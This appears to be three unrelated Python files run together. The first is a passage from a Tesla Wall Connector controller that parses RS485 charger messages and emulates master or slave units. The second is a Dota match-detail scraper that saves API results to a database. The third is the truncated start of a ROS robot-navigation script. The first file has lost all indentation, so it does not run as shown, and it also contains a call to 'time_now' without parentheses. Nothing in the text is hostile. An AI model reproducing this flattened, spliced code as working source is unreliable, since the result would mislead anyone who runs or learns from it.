'password':m.group(2).decode('ascii')})
elif(webMsg[0:23] == b'setMasterHeartbeatData='):
m = re.search(b'([0-9a-fA-F]*)', webMsg[23:len(webMsg)], re.MULTILINE)
if(m):
if(len(m.group(1)) > 0):
overrideMasterHeartbeatData = trim_pad(bytearray.fromhex(m.group(1).decode('ascii')),
9 if slaveTWCRoundRobin[0].protocolVersion == 2 else 7)
else:
overrideMasterHeartbeatData = b''
elif(webMsg == b'chargeNow'):
chargeNowAmps = wiringMaxAmpsAllTWCs
chargeNowTimeEnd = now + 60*60*24
elif(webMsg == b'chargeNowCancel'):
chargeNowAmps = 0
chargeNowTimeEnd = 0
elif(webMsg == b'dumpState'):
# dumpState commands are used for debugging. They are called
# using a web page:
# http://(Pi address)/index.php?submit=1&dumpState=1
webResponseMsg = ('time=' + str(now) + ', fakeMaster='
+ str(fakeMaster) + ', rs485Adapter=' + rs485Adapter
+ ', baud=' + str(baud)
+ ', wiringMaxAmpsAllTWCs=' + str(wiringMaxAmpsAllTWCs)
+ ', wiringMaxAmpsPerTWC=' + str(wiringMaxAmpsPerTWC)
+ ', minAmpsPerTWC=' + str(minAmpsPerTWC)
+ ', greenEnergyAmpsOffset=' + str(greenEnergyAmpsOffset)
+ ', debugLevel=' + str(debugLevel)
+ '\n')
webResponseMsg += (
'carApiStopAskingToStartCharging=' + str(carApiStopAskingToStartCharging)
+ '\ncarApiLastStartOrStopChargeTime=' + str(time.strftime("%m-%d-%y %H:%M:%S", time.localtime(carApiLastStartOrStopChargeTime)))
+ '\ncarApiLastErrorTime=' + str(time.strftime("%m-%d-%y %H:%M:%S", time.localtime(carApiLastErrorTime)))
+ '\ncarApiTokenExpireTime=' + str(time.strftime("%m-%d-%y %H:%M:%S", time.localtime(carApiTokenExpireTime)))
+ '\n'
)
for vehicle in carApiVehicles:
webResponseMsg += str(vehicle.__dict__) + '\n'
webResponseMsg += 'slaveTWCRoundRobin:\n'
for slaveTWC in slaveTWCRoundRobin:
webResponseMsg += str(slaveTWC.__dict__) + '\n'
numPackets = math.ceil(len(webResponseMsg) / 290)
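                    # Example: a 700-byte dumpState response is sent as a
                    # 1-byte packet-count message (ceil(700 / 290) = 3)
                    # followed by packets of 290, 290 and 120 bytes; see the
                    # send loop further below.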
elif(webMsg[0:14] == b'setDebugLevel='):
m = re.search(b'([-0-9]+)', webMsg[14:len(webMsg)], re.MULTILINE)
if(m):
debugLevel = int(m.group(1))
else:
print(time_now() + ": Unknown IPC request from web server: " + str(webMsg))
if(len(webResponseMsg) > 0):
if(debugLevel >= 5):
print(time_now() + ": Web query response: '" + webResponseMsg + "'")
try:
if(numPackets == 0):
if(len(webResponseMsg) > 290):
webResponseMsg = webResponseMsg[0:290]
webIPCqueue.send(struct.pack('=LH' + str(len(webResponseMsg)) + 's', webMsgTime, webMsgID,
webResponseMsg.encode('ascii')), block=False)
else:
# In this case, block=False prevents blocking if the message
# queue is too full for our message to fit. Instead, an
# error is returned.
msgTemp = struct.pack('=LH1s', webMsgTime, webMsgID, bytearray([numPackets]))
webIPCqueue.send(msgTemp, block=False)
for i in range(0, numPackets):
packet = webResponseMsg[i*290:i*290+290]
webIPCqueue.send(struct.pack('=LH' + str(len(packet)) + 's', webMsgTime, webMsgID,
packet.encode('ascii')), block=False)
except sysv_ipc.BusyError:
print(time_now() + ": Error: IPC queue full when trying to send response to web interface.")
except sysv_ipc.BusyError:
# No web message is waiting.
pass
except sysv_ipc.ExistentialError:
pass
########################################################################
# See if there's an incoming message on the RS485 interface.
timeMsgRxStart = time.time()
while True:
now = time.time()
dataLen = ser.inWaiting()
if(dataLen == 0):
if(msgLen == 0):
# No message data waiting and we haven't received the
# start of a new message yet. Break out of inner while
# to continue at top of outer while loop where we may
# decide to send a periodic message.
break
else:
# No message data waiting but we've received a partial
# message that we should wait to finish receiving.
if(now - timeMsgRxStart >= 2.0):
if(debugLevel >= 9):
print(time_now() + ": Msg timeout (" + hex_str(ignoredData) +
') ' + hex_str(msg[0:msgLen]))
msgLen = 0
ignoredData = bytearray()
break
time.sleep(0.025)
continue
else:
dataLen = 1
data = ser.read(dataLen)
if(dataLen != 1):
# This should never happen
print("WARNING: No data available.")
break
timeMsgRxStart = now
timeLastRx = now
if(msgLen == 0 and data[0] != 0xc0):
# We expect to find these non-c0 bytes between messages, so
# we don't print any warning at standard debug levels.
if(debugLevel >= 11):
print("Ignoring byte %02X between messages." % (data[0]))
ignoredData += data
continue
elif(msgLen > 0 and msgLen < 15 and data[0] == 0xc0):
# If you see this when the program is first started, it
# means we started listening in the middle of the TWC
# sending a message so we didn't see the whole message and
# must discard it. That's unavoidable.
# If you see this any other time, it means there was some
# corruption in what we received. It's normal for that to
# happen every once in awhile but there may be a problem
# such as incorrect termination or bias resistors on the
# rs485 wiring if you see it frequently.
if(debugLevel >= 10):
print("Found end of message before full-length message received. " \
"Discard and wait for new message.")
msg = data
msgLen = 1
continue
if(msgLen == 0):
msg = bytearray()
msg += data
msgLen += 1
# Messages are usually 17 bytes or longer and end with \xc0\xfe.
# However, when the network lacks termination and bias
# resistors, the last byte (\xfe) may be corrupted or even
# missing, and you may receive additional garbage bytes between
# messages.
#
# TWCs seem to account for corruption at the end and between
# messages by simply ignoring anything after the final \xc0 in a
# message, so we use the same tactic. If c0 happens to be within
# the corrupt noise between messages, we ignore it by starting a
# new message whenever we see a c0 before 15 or more bytes are
# received.
#
# Uncorrupted messages can be over 17 bytes long when special
# values are "escaped" as two bytes. See notes in send_msg.
#
# To prevent most noise between messages, add a 120ohm
# "termination" resistor in parallel to the D+ and D- lines.
# Also add a 680ohm "bias" resistor between the D+ line and +5V
# and a second 680ohm "bias" resistor between the D- line and
# ground. See here for more information:
# https://www.ni.com/support/serial/resinfo.htm
# http://www.ti.com/lit/an/slyt514/slyt514.pdf
# This explains what happens without "termination" resistors:
# https://e2e.ti.com/blogs_/b/analogwire/archive/2016/07/28/rs-485-basics-when-termination-is-necessary-and-how-to-do-it-properly
if(msgLen >= 16 and data[0] == 0xc0):
break
if(msgLen >= 16):
msg = unescape_msg(msg, msgLen)
# Set msgLen = 0 at start so we don't have to do it on errors below.
                # len(msg) now contains the unescaped message length.
msgLen = 0
msgRxCount += 1
# When the sendTWCMsg web command is used to send a message to the
# TWC, it sets lastTWCResponseMsg = b''. When we see that here,
# set lastTWCResponseMsg to any unusual message received in response
# to the sent message. Never set lastTWCResponseMsg to a commonly
# repeated message like master or slave linkready, heartbeat, or
# voltage/kWh report.
if(lastTWCResponseMsg == b''
and msg[0:2] != b'\xFB\xE0' and msg[0:2] != b'\xFD\xE0'
and msg[0:2] != b'\xFC\xE1' and msg[0:2] != b'\xFB\xE2'
and msg[0:2] != b'\xFD\xE2' and msg[0:2] != b'\xFB\xEB'
and msg[0:2] != b'\xFD\xEB' and msg[0:2] != b'\xFD\xE0'
):
lastTWCResponseMsg = msg
if(debugLevel >= 9):
print("Rx@" + time_now() + ": (" + hex_str(ignoredData) + ') ' \
+ hex_str(msg) + "")
ignoredData = bytearray()
# After unescaping special values and removing the leading and
# trailing C0 bytes, the messages we know about are always 14 bytes
# long in original TWCs, or 16 bytes in newer TWCs (protocolVersion
# == 2).
if(len(msg) != 14 and len(msg) != 16):
print(time_now() + ": ERROR: Ignoring message of unexpected length %d: %s" % \
(len(msg), hex_str(msg)))
continue
checksumExpected = msg[len(msg) - 1]
checksum = 0
for i in range(1, len(msg) - 1):
checksum += msg[i]
if((checksum & 0xFF) != checksumExpected):
print("ERROR: Checksum %X does not match %02X. Ignoring message: %s" %
(checksum, checksumExpected, hex_str(msg)))
continue
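                # Worked example: if the bytes between the first byte and the
                # final checksum byte sum to 0x1E5, the low byte
                # (0x1E5 & 0xFF = 0xE5) must equal that final checksum byte.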
if(fakeMaster == 1):
############################
# Pretend to be a master TWC
foundMsgMatch = False
# We end each regex message search below with \Z instead of $
# because $ will match a newline at the end of the string or the
# end of the string (even without the re.MULTILINE option), and
# sometimes our strings do end with a newline character that is
# actually the CRC byte with a value of 0A or 0D.
msgMatch = re.search(b'^\xfd\xe2(..)(.)(..)\x00\x00\x00\x00\x00\x00.+\Z', msg, re.DOTALL)
if(msgMatch and foundMsgMatch == False):
# Handle linkready message from slave.
#
# We expect to see one of these before we start sending our
# own heartbeat message to slave.
# Once we start sending our heartbeat to slave once per
# second, it should no longer send these linkready messages.
# If slave doesn't hear master's heartbeat for around 10
# seconds, it sends linkready once per 10 seconds and starts
# flashing its red LED 4 times with the top green light on.
# Red LED stops flashing if we start sending heartbeat
# again.
foundMsgMatch = True
senderID = msgMatch.group(1)
sign = msgMatch.group(2)
maxAmps = ((msgMatch.group(3)[0] << 8) + msgMatch.group(3)[1]) / 100
if(debugLevel >= 1):
print(time_now() + ": %.2f amp slave TWC %02X%02X is ready to link. Sign: %s" % \
(maxAmps, senderID[0], senderID[1],
hex_str(sign)))
if(maxAmps >= 80):
# U.S. chargers need a spike to 21A to cancel a 6A
# charging limit imposed in an Oct 2017 Tesla car
# firmware update. See notes where
# spikeAmpsToCancel6ALimit is used.
spikeAmpsToCancel6ALimit = 21
else:
# EU chargers need a spike to only 16A. This value
# comes from a forum post and has not been directly
# tested.
spikeAmpsToCancel6ALimit = 16
if(senderID == fakeTWCID):
print(time_now + ": Slave TWC %02X%02X reports same TWCID as master. " \
"Slave should resolve by changing its TWCID." % \
(senderID[0], senderID[1]))
# I tested sending a linkready to a real master with the
# same TWCID as master and instead of master sending back
# its heartbeat message, it sent 5 copies of its
# linkready1 and linkready2 messages. Those messages
# will prompt a real slave to pick a new random value
# for its TWCID.
#
# We mimic that behavior by setting numInitMsgsToSend =
                            # 10 to make the idle code at the top of the main
                            # while loop send 5 copies of linkready1 and linkready2.
numInitMsgsToSend = 10
continue
# We should always get this linkready message at least once
# and generally no more than once, so this is a good
# opportunity to add the slave to our known pool of slave
# devices.
slaveTWC = new_slave(senderID, maxAmps)
if(slaveTWC.protocolVersion == 1 and slaveTWC.minAmpsTWCSupports == 6):
if(len(msg) == 14):
slaveTWC.protocolVersion = 1
slaveTWC.minAmpsTWCSupports = 5
elif(len(msg) == 16):
slaveTWC.protocolVersion = 2
slaveTWC.minAmpsTWCSupports = 6
if(debugLevel >= 1):
print(time_now() + ": Set slave TWC %02X%02X protocolVersion to %d, minAmpsTWCSupports to %d." % \
(senderID[0], senderID[1], slaveTWC.protocolVersion, slaveTWC.minAmpsTWCSupports))
# We expect maxAmps to be 80 on U.S. chargers and 32 on EU
# chargers. Either way, don't allow
# slaveTWC.wiringMaxAmps to be greater than maxAmps.
if(slaveTWC.wiringMaxAmps > maxAmps):
print("\n\n!!! DANGER DANGER !!!\nYou have set wiringMaxAmpsPerTWC to "
+ str(wiringMaxAmpsPerTWC)
+ " which is greater than the max "
+ str(maxAmps) + " amps your charger says it can handle. " \
"Please review instructions in the source code and consult an " \
"electrician if you don't know what to do.")
slaveTWC.wiringMaxAmps = maxAmps / 4
# Make sure we print one SHB message after a slave
# linkready message is received by clearing
# lastHeartbeatDebugOutput. This helps with debugging
# cases where I can't tell if we responded with a
# heartbeat or not.
slaveTWC.lastHeartbeatDebugOutput = ''
slaveTWC.timeLastRx = time.time()
slaveTWC.send_master_heartbeat()
else:
msgMatch = re.search(b'\A\xfd\xe0(..)(..)(.......+?).\Z', msg, re.DOTALL)
if(msgMatch and foundMsgMatch == False):
# Handle heartbeat message from slave.
#
# These messages come in as a direct response to each
# heartbeat message from master. Slave does not send its
# heartbeat until it gets one from master first.
# A real master sends heartbeat to a slave around once per
                            # second, so we do the same near the top of the main
                            # while loop. Thus, we should receive a heartbeat reply from the
# slave around once per second as well.
foundMsgMatch = True
senderID = msgMatch.group(1)
receiverID = msgMatch.group(2)
heartbeatData = msgMatch.group(3)
try:
slaveTWC = slaveTWCs[senderID]
except KeyError:
# Normally, a slave only sends us a heartbeat message if
# we send them ours first, so it's not expected we would
# hear heartbeat from a slave that's not in our list.
print(time_now() + ": ERROR: Received heartbeat message from " \
"slave %02X%02X that we've not met before." % \
(senderID[0], senderID[1]))
continue
if(fakeTWCID == receiverID):
slaveTWC.receive_slave_heartbeat(heartbeatData)
else:
# I've tried different fakeTWCID values to verify a
# slave will send our fakeTWCID back to us as
# receiverID. However, I once saw it send receiverID =
# 0000.
# I'm not sure why it sent 0000 and it only happened
# once so far, so it could have been corruption in the
# data or an unusual case.
if(debugLevel >= 1):
print(time_now() + ": WARNING: Slave TWC %02X%02X status data: " \
"%s sent to unknown TWC %02X%02X." % \
(senderID[0], senderID[1],
hex_str(heartbeatData), receiverID[0], receiverID[1]))
else:
msgMatch = re.search(b'\A\xfd\xeb(..)(..)(.+?).\Z', msg, re.DOTALL)
if(msgMatch and foundMsgMatch == False):
# Handle kWh total and voltage message from slave.
#
# This message can only be generated by TWCs running newer
# firmware. I believe it's only sent as a response to a
# message from Master in this format:
# FB EB <Master TWCID> <Slave TWCID> 00 00 00 00 00 00 00 00 00
# Since we never send such a message, I don't expect a slave
# to ever send this message to us, but we handle it just in
# case.
# According to FuzzyLogic, this message has the following
# format on an EU (3-phase) TWC:
# FD EB <Slave TWCID> 00000038 00E6 00F1 00E8 00
# 00000038 (56) is the total kWh delivered to cars
# by this TWC since its construction.
# 00E6 (230) is voltage on phase A
# 00F1 (241) is voltage on phase B
# 00E8 (232) is voltage on phase C
#
# I'm guessing in world regions with two-phase power that
# this message would be four bytes shorter, but the pattern
# above will match a message of any length that starts with
# FD EB.
foundMsgMatch = True
senderID = msgMatch.group(1)
receiverID = msgMatch.group(2)
data = msgMatch.group(3)
if(debugLevel >= 1):
print(time_now() + ": Slave TWC %02X%02X unexpectedly reported kWh and voltage data: %s." % \
(senderID[0], senderID[1],
hex_str(data)))
else:
msgMatch = re.search(b'\A\xfc(\xe1|\xe2)(..)(.)\x00\x00\x00\x00\x00\x00\x00\x00.+\Z', msg, re.DOTALL)
if(msgMatch and foundMsgMatch == False):
foundMsgMatch = True
print(time_now() + " ERROR: TWC is set to Master mode so it can't be controlled by TWCManager. " \
"Search installation instruction PDF for 'rotary switch' and set " \
"switch so its arrow points to F on the dial.")
if(foundMsgMatch == False):
print(time_now() + ": *** UNKNOWN MESSAGE FROM SLAVE:" + hex_str(msg)
+ "\nPlease private message user CDragon at http://teslamotorsclub.com " \
"with a copy of this error.")
else:
###########################
# Pretend to be a slave TWC
foundMsgMatch = False
msgMatch = re.search(b'\A\xfc\xe1(..)(.)\x00\x00\x00\x00\x00\x00\x00\x00+?.\Z', msg, re.DOTALL)
if(msgMatch and foundMsgMatch == False):
# Handle linkready1 from master.
# See notes in send_master_linkready1() for details.
foundMsgMatch = True
senderID = msgMatch.group(1)
sign = msgMatch.group(2)
masterTWCID = senderID
# This message seems to always contain seven 00 bytes in its
# data area. If we ever get this message with non-00 data
# we'll print it as an unexpected message.
if(debugLevel >= 1):
print(time_now() + ": Master TWC %02X%02X Linkready1. Sign: %s" % \
(senderID[0], senderID[1], hex_str(sign)))
if(senderID == fakeTWCID):
master_id_conflict()
# Other than picking a new fakeTWCID if ours conflicts with
# master, it doesn't seem that a real slave will make any
# sort of direct response when sent a master's linkready1 or
# linkready2.
else:
msgMatch = re.search(b'\A\xfb\xe2(..)(.)\x00\x00\x00\x00\x00\x00\x00\x00+?.\Z', msg, re.DOTALL)
if(msgMatch and foundMsgMatch == False):
# Handle linkready2 from master.
# See notes in send_master_linkready2() for details.
foundMsgMatch = True
senderID = msgMatch.group(1)
sign = msgMatch.group(2)
masterTWCID = senderID
# This message seems to always contain seven 00 bytes in its
# data area. If we ever get this message with non-00 data
# we'll print it as an unexpected message.
if(debugLevel >= 1):
print(time_now() + ": Master TWC %02X%02X Linkready2. Sign: %s" % \
(senderID[0], senderID[1], hex_str(sign)))
if(senderID == fakeTWCID):
master_id_conflict()
else:
msgMatch = re.search(b'\A\xfb\xe0(..)(..)(.......+?).\Z', msg, re.DOTALL)
if(msgMatch and foundMsgMatch == False):
# Handle heartbeat message from Master.
foundMsgMatch = True
senderID = msgMatch.group(1)
receiverID = msgMatch.group(2)
heartbeatData = msgMatch.group(3)
masterTWCID = senderID
try:
slaveTWC = slaveTWCs[receiverID]
except KeyError:
slaveTWC = new_slave(receiverID, 80)
slaveTWC.masterHeartbeatData = heartbeatData
if(receiverID != fakeTWCID):
# This message was intended for another slave.
# Ignore it.
if(debugLevel >= 11):
print(time_now() + ": Master %02X%02X sent " \
"heartbeat message %s to receiver %02X%02X " \
"that isn't our fake slave." % \
(senderID[0], senderID[1],
hex_str(heartbeatData),
receiverID[0], receiverID[1]))
continue
amps = (slaveHeartbeatData[1] << 8) + slaveHeartbeatData[2]
kWhDelivered += (((240 * (amps/100)) / 1000 / 60 / 60) * (now - timeLastkWhDelivered))
timeLastkWhDelivered = now
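                                # Example: with amps = 3200 (32.00A) at the
                                # assumed 240V, this adds 7.68kW * (60 / 3600)h
                                # = 0.128 kWh over a 60-second interval.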
if(time.time() - timeLastkWhSaved >= 300.0):
timeLastkWhSaved = now
if(debugLevel >= 9):
print(time_now() + ": Fake slave has delivered %.3fkWh" % \
(kWhDelivered))
save_settings()
if(heartbeatData[0] == 0x07):
# Lower amps in use (not amps allowed) by 2 for 10
# seconds. Set state to 07.
slaveHeartbeatData[0] = heartbeatData[0]
timeToRaise2A = now + 10
amps -= 280
slaveHeartbeatData[3] = ((amps >> 8) & 0xFF)
slaveHeartbeatData[4] = (amps & 0xFF)
elif(heartbeatData[0] == 0x06):
# Raise amp setpoint by 2 permanently and reply with
# state 06. After 44 seconds, report state 0A.
timeTo0Aafter06 = now + 44
slaveHeartbeatData[0] = heartbeatData[0]
amps += 200
slaveHeartbeatData[1] = ((amps >> 8) & 0xFF)
slaveHeartbeatData[2] = (amps & 0xFF)
amps -= 80
slaveHeartbeatData[3] = ((amps >> 8) & 0xFF)
slaveHeartbeatData[4] = (amps & 0xFF)
elif(heartbeatData[0] == 0x05 or heartbeatData[0] == 0x08 or heartbeatData[0] == 0x09):
if(((heartbeatData[1] << 8) + heartbeatData[2]) > 0):
# A real slave mimics master's status bytes [1]-[2]
# representing max charger power even if the master
# sends it a crazy value.
slaveHeartbeatData[1] = heartbeatData[1]
slaveHeartbeatData[2] = heartbeatData[2]
ampsUsed = (heartbeatData[1] << 8) + heartbeatData[2]
ampsUsed -= 80
slaveHeartbeatData[3] = ((ampsUsed >> 8) & 0xFF)
slaveHeartbeatData[4] = (ampsUsed & 0xFF)
elif(heartbeatData[0] == 0):
if(timeTo0Aafter06 > 0 and timeTo0Aafter06 < now):
timeTo0Aafter06 = 0
slaveHeartbeatData[0] = 0x0A
elif(timeToRaise2A > 0 and timeToRaise2A < now):
# Real slave raises amps used by 2 exactly 10
# seconds after being sent into state 07. It raises
# a bit slowly and sets its state to 0A 13 seconds
# after state 07. We aren't exactly emulating that
# timing here but hopefully close enough.
timeToRaise2A = 0
amps -= 80
slaveHeartbeatData[3] = ((amps >> 8) & 0xFF)
slaveHeartbeatData[4] = (amps & 0xFF)
slaveHeartbeatData[0] = 0x0A
elif(heartbeatData[0] == 0x02):
print(time_now() + ": Master heartbeat contains error %ld: %s" % \
(heartbeatData[1], hex_str(heartbeatData)))
else:
print(time_now() + ": UNKNOWN MHB state %s" % \
(hex_str(heartbeatData)))
# Slaves always respond to master's heartbeat by sending
# theirs back.
slaveTWC.send_slave_heartbeat(senderID)
slaveTWC.print_status(slaveHeartbeatData)
else:
msgMatch = re.search(b'\A\xfc\x1d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00+?.\Z', msg, re.DOTALL)
if(msgMatch and foundMsgMatch == False):
# Handle 2-hour idle message
#
# This message is sent from a Master TWC three times in a
# row every 2 hours:
# c0 fc 1d 00 00 00 00 00 00 00 00 00 00 00 1d c0
#
# I'd say this is used to indicate the master is still
# alive, but it doesn't contain the Master's TWCID or any other
# data so I don't see what any receiving TWC can do with it.
#
# I suspect this message is only sent when the master
# doesn't see any other TWCs on the network, so I don't
# bother to have our fake master send these messages being
# as there's no point in playing a fake master with no
# slaves around.
foundMsgMatch = True
if(debugLevel >= 1):
print(time_now() + ": Received 2-hour idle message from Master.")
else:
msgMatch = re.search(b'\A\xfd\xe2(..)(.)(..)\x00\x00\x00\x00\x00\x00.+\Z', msg, re.DOTALL)
if(msgMatch and foundMsgMatch == False):
# Handle linkready message from slave on network that
# presumably isn't us.
foundMsgMatch = True
senderID = msgMatch.group(1)
sign = msgMatch.group(2)
maxAmps = ((msgMatch.group(3)[0] << 8) + msgMatch.group(3)[1]) / 100
if(debugLevel >= 1):
print(time_now() + ": %.2f amp slave TWC %02X%02X is ready to link. Sign: %s" % \
(maxAmps, senderID[0], senderID[1],
hex_str(sign)))
if(senderID == fakeTWCID):
print(time_now() + ": ERROR: Received slave heartbeat message from " \
"slave %02X%02X that has the same TWCID as our fake slave." % \
(senderID[0], senderID[1]))
continue
new_slave(senderID, maxAmps)
else:
msgMatch = re.search(b'\A\xfd\xe0(..)(..)(.......+?).\Z', msg, re.DOTALL)
if(msgMatch and foundMsgMatch == False):
# Handle heartbeat message from slave on network that
# presumably isn't us.
foundMsgMatch = True
senderID = msgMatch.group(1)
receiverID = msgMatch.group(2)
heartbeatData = msgMatch.group(3)
if(senderID == fakeTWCID):
print(time_now() + ": ERROR: Received slave heartbeat message from " \
"slave %02X%02X that has the same TWCID as our fake slave." % \
(senderID[0], senderID[1]))
continue
try:
slaveTWC = slaveTWCs[senderID]
except KeyError:
# Slave is unlikely to send another linkready since it's
# already linked with a real Master TWC, so just assume
# it's 80A.
slaveTWC = new_slave(senderID, 80)
slaveTWC.print_status(heartbeatData)
else:
msgMatch = re.search(b'\A\xfb\xeb(..)(..)(\x00\x00\x00\x00\x00\x00\x00\x00\x00+?).\Z', msg, re.DOTALL)
if(msgMatch and foundMsgMatch == False):
# Handle voltage request message. This is only supported in
# Protocol 2 so we always reply with a 16-byte message.
foundMsgMatch = True
senderID = msgMatch.group(1)
receiverID = msgMatch.group(2)
if(senderID == fakeTWCID):
print(time_now() + ": ERROR: Received voltage request message from " \
"TWC %02X%02X that has the same TWCID as our fake slave." % \
(senderID[0], senderID[1]))
continue
if(debugLevel >= 8):
print(time_now() + ": VRQ from %02X%02X to %02X%02X" % \
(senderID[0], senderID[1], receiverID[0], receiverID[1]))
if(receiverID == fakeTWCID):
kWhCounter = int(kWhDelivered)
kWhPacked = bytearray([((kWhCounter >> 24) & 0xFF),
((kWhCounter >> 16) & 0xFF),
((kWhCounter >> 8) & 0xFF),
(kWhCounter & 0xFF)])
print(time_now() + ": VRS %02X%02X: %dkWh (%s) %dV %dV %dV" % \
(fakeTWCID[0], fakeTWCID[1],
kWhCounter, hex_str(kWhPacked), 240, 0, 0))
send_msg(bytearray(b'\xFD\xEB') + fakeTWCID
+ kWhPacked
+ bytearray(b'\x00\xF0\x00\x00\x00\x00\x00'))
else:
msgMatch = re.search(b'\A\xfd\xeb(..)(.........+?).\Z', msg, re.DOTALL)
if(msgMatch and foundMsgMatch == False):
# Handle voltage response message.
# Example US value:
# FD EB 7777 00000014 00F6 0000 0000 00
# EU value (3 phase power):
# FD EB 7777 00000038 00E6 00F1 00E8 00
foundMsgMatch = True
senderID = msgMatch.group(1)
data = msgMatch.group(2)
kWhCounter = (data[0] << 24) + (data[1] << 16) + (data[2] << 8) + data[3]
voltsPhaseA = (data[4] << 8) + data[5]
voltsPhaseB = (data[6] << 8) + data[7]
voltsPhaseC = (data[8] << 8) + data[9]
if(senderID == fakeTWCID):
print(time_now() + ": ERROR: Received voltage response message from " \
"TWC %02X%02X that has the same TWCID as our fake slave." % \
(senderID[0], senderID[1]))
continue
if(debugLevel >= 1):
print(time_now() + ": VRS %02X%02X: %dkWh %dV %dV %dV" % \
(senderID[0], senderID[1],
kWhCounter, voltsPhaseA, voltsPhaseB, voltsPhaseC))
if(foundMsgMatch == False):
print(time_now() + ": ***UNKNOWN MESSAGE from master: " + hex_str(msg))
except KeyboardInterrupt:
print("Exiting after background tasks complete...")
break
except Exception as e:
# Print info about unhandled exceptions, then continue. Search for
# 'Traceback' to find these in the log.
traceback.print_exc()
# Sleep 5 seconds so the user might see the error.
time.sleep(5)
# Wait for background tasks thread to finish all tasks.
# Note that there is no such thing as backgroundTasksThread.stop(). Because we
# set the thread type to daemon, it will be automatically killed when we exit
# this program.
backgroundTasksQueue.join()
ser.close()
#
# End main program
#
##############################
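# The voltage response handler above decodes the FD EB payload by hand: a
# 32-bit kWh counter followed by three 16-bit phase voltages. The helper below
# is only an illustrative sketch of that same layout using struct; it is not
# called anywhere in this program and assumes it is handed the 10 data bytes
# that follow the sender's TWCID.
def decode_voltage_response_payload(data):
    import struct
    # '>IHHH' = big-endian uint32 kWh counter, then three uint16 voltages.
    kWhCounter, voltsPhaseA, voltsPhaseB, voltsPhaseC = struct.unpack('>IHHH', bytes(data[0:10]))
    return kWhCounter, voltsPhaseA, voltsPhaseB, voltsPhaseC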
|
match_details.py
|
"""This module pulls matches from the matches table and gets detailed information on them and saves it in the database.
TODO:
Fix the sql schema, season isn't included.
And also store all the data about the player such as item, level, abilities whatever etc.
"""
import urllib.request
import urllib.parse
import json
import time
import database
from info import *
from connection import fetch
import threading
from CollectionCounter import CollectionCounter
from collections import namedtuple
class MatchIDRetriever:
"""Thread-safe class to retrieve unchecked player account_ids from the database.
"""
lock = threading.Lock()
    def get_ids(self, n: int):  # A plain loop over get_match() would also work; kept as a generator for convenience.
"""Generator to yield an unchecked match_id.
Args:
n: How many matches to yield.
Yields:
Yields an unchecked match.
"""
i = 0
while i < n:
yield self.get_match()
i += 1
def get_match(self) -> int:
"""Get an unchecked match.
Returns:
            Returns a match ID that has not been checked yet, and marks it as checked.
"""
with self.lock:
conn, cur = database.get()
cur.execute('SELECT match_id from matches WHERE checked = 0 LIMIT 1')
id_ = None
for x in cur:
id_ = x[0]
cur.execute('UPDATE matches SET checked=1 WHERE match_id=?', (id_,))
conn.commit()
conn.close()
return id_
class Table:
def __init__(self, name: str, fields: tuple):
self.name = name
self.fields = fields
def construct_insert(self):
return "INSERT OR IGNORE INTO {0} VALUES ({1})".format(self.name, ("?,"*len(self.fields))[:-1])
def save_to_disk_matches_detailed(data : dict, cur):
# I use it 'cause it's fancy and I want to remember namedtuples in the future :) This is a gross misuse though.
fields = namedtuple('matches_detailed_fields',
["radiant_win", "duration", "pre_game_duration", "start_time", "match_id", "match_seq_num",
"tower_status_radiant", "tower_status_dire", "cluster", "first_blood_time", "lobby_type",
"human_players",
"leagueid", "positive_votes", "negative_votes", "game_mode", "flags", "engine",
"radiant_score", "dire_score"])
table = Table("matches_detailed", fields._fields)
extracted_data = [data["result"][k] for k in fields._fields]
try:
cur.execute(table.construct_insert(),
extracted_data)
except KeyError:
pass
def save_to_disk_player_match_detailed(data : dict, cur):
fields = namedtuple('player_match_detailed_fields',
["account_id", "player_slot", "hero_id", "item_0", "item_1", "item_2", "item_3",
"item_4", "item_5", "kills", "deaths", "assists", "leaver_status", "gold", "last_hits", "denies",
"gold_per_min", "xp_per_min", "gold_spent", "hero_damage", "tower_damage", "hero_healing",
"level", "match_id"])
field_positions = dict(zip(fields._fields, range(len(fields._fields))))
table = Table("player_match_detailed", fields._fields)
for player in data["result"]["players"]:
extracted_data = list(map(player.get, fields._fields))
        extracted_data = [x if x is not None else -1 for x in extracted_data]  # only substitute missing values; keep legitimate zeros
extracted_data[field_positions["match_id"]] = data["result"]["match_id"] # Set match_id
try:
cur.execute(
table.construct_insert(),
extracted_data)
except KeyError:
pass
def save_to_disk_ability_upgrade(data : dict, cur):
fields = namedtuple('ability_upgrade_fields',
["ability", "time", "level", "account_id", "match_id"])
field_positions = dict(zip(fields._fields, range(len(fields._fields))))
table = Table("ability_upgrade", fields._fields)
for player in data["result"]["players"]:
if "ability_upgrades" not in player:
continue
for ability_upgrade in player["ability_upgrades"]:
extracted_data = list(map(ability_upgrade.get, fields._fields))
if "account_id" in player:
extracted_data[field_positions["account_id"]] = player["account_id"]
else:
extracted_data[field_positions["account_id"]] = -1
extracted_data[field_positions["match_id"]] = data["result"]["match_id"]
cur.execute(
table.construct_insert(),
extracted_data)
def save_to_disk(data: dict):
conn, cur = database.get()
save_to_disk_matches_detailed(data, cur)
save_to_disk_player_match_detailed(data, cur)
save_to_disk_ability_upgrade(data, cur)
conn.commit()
conn.close()
def collect(api_key: str, match_details_counter: CollectionCounter = None):
    match_retriever = MatchIDRetriever()
    data = None
    try:
        for id_ in match_retriever.get_ids(100000):
            params = urllib.parse.urlencode({'key': api_key, 'match_id': id_})
            response = fetch(GET_MATCH_DETAILS_URL, params)
            data = json.loads(response)
            match_details_counter.increment(1)
            save_to_disk(data)
    except KeyboardInterrupt:
        # Best-effort: persist the last response fetched before the interrupt, if any.
        if data is not None:
            save_to_disk(data)
def main():
match_details_counter = CollectionCounter()
for i in range(1, 50):
key = get_key()
t = threading.Thread(target=collect, args=(key, match_details_counter), name=key)
t.start()
time.sleep(1 / 6) # So requests are out of sync.
if __name__ == "__main__":
main()
|
A5.py
|
#!/usr/bin/env python
import rvo2
import matplotlib.pyplot as plt
import numpy as np
import random
import rospy
import time
import threading
import math
import sys
from utils import *
from nav_msgs.msg import Odometry
import A5easyGo as easyGo
rospy.init_node('A5_mvs', anonymous=False)
SIMUL_HZ = 10.0
sim = rvo2.PyRVOSimulator(1/SIMUL_HZ, 15.0, 10, 5.0, 2.0, 0.15, 3.0)
COL = 10.0
ROW = 10.0
voxel_size = 0.5
size = voxel_size/2
#ROBOT MOVE
SPEED = 20 # 14
ROTATE_SPEED = 25 # 25
ORCA_THRES = 2
global Target
Target = [1.5, 0.1]
def GoEasy(direc):
if direc == 4: # Backward
easyGo.mvStraight(- SPEED, -1)
elif direc == 0 or direc == 1: # Go straight
